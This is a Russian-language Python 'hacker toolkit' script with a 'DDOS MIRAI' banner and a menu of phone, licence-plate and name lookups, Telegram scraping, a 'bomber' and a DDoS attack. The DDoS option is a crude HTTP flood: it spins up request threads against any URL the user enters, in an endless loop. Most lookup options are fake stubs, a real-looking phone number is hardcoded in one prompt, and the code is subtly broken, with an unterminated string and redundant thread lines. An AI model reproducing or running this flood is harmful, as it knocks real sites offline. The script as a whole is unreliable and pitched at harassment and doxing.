import time
import validators
import requests
import threading
print('\033[91m██████╗░██████╗░░█████╗░░██████╗  ███╗░░░███╗██╗██████╗░░█████╗░██╗\n██╔══██╗██╔══██╗██╔══██╗██╔════╝  ████╗░████║██║██╔══██╗██╔══██╗██║\n██║░░██║██║░░██║██║░░██║╚█████╗░  ██╔████╔██║██║██████╔╝███████║██║\n██║░░██║██║░░██║██║░░██║░╚═══██╗  ██║╚██╔╝██║██║██╔══██╗██╔══██║██║\n██████╔╝██████╔╝╚█████╔╝██████╔╝  ██║░╚═╝░██║██║██║░░██║██║░░██║██║\n╚═════╝░╚═════╝░░╚════╝░╚═════╝░  ╚═╝░░░░░╚═╝╚═╝╚═╝░░╚═╝╚═╝░░╚═╝╚═╝\033[0m')
print('\n')
print('1 - Поиск по номеру          |       7 - База данных\n2 - Поиск по номеру машины   |       8 - Прокси\n3 - Поиск по ФИО             |       9 - Бомбер\n4 - Ддос атака\n5 - Парсинг телеграмм\n6 - Рассылка телеграмм')
print('\n')
int = input('/n1')

def make_request(url):
    response = requests.get(url)
    print(response.status_code)
        
if int == "1":
    num = input('Введите номер телефона:+79612985919
 ')
    print("Нечего не найдено.")

if int == "2":
    num = input('Введите номер машины: ')
    print("Нечего не найдено.")

if int == "3":
    num = input('Введите ФИО: ')
    print("Нечего не найдено.")

if int == "4":
    url = input("Введите URL сайта:")
    if not validators.url(url):
        print("Введите корректную ссылку")
    else:
        print("Атака успешно начата!")
        while True:
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t = threading.Thread(target=make_request, args=(url,))
            t.start()

if int == "5":
    num = input("Введите ссылку telegram:")
    print("Не удалось спарсить telegram")

if int == "6":
    num = input("Введите ссылку telegram:")
    print("Ошибка")

if int == "7":
    print("Нечего не найдено")

if int == "8":
    print("Нечего не найдено")

if int == "7":
    num = input('Введите номер телефона +:')
    print('Атака успешно начата')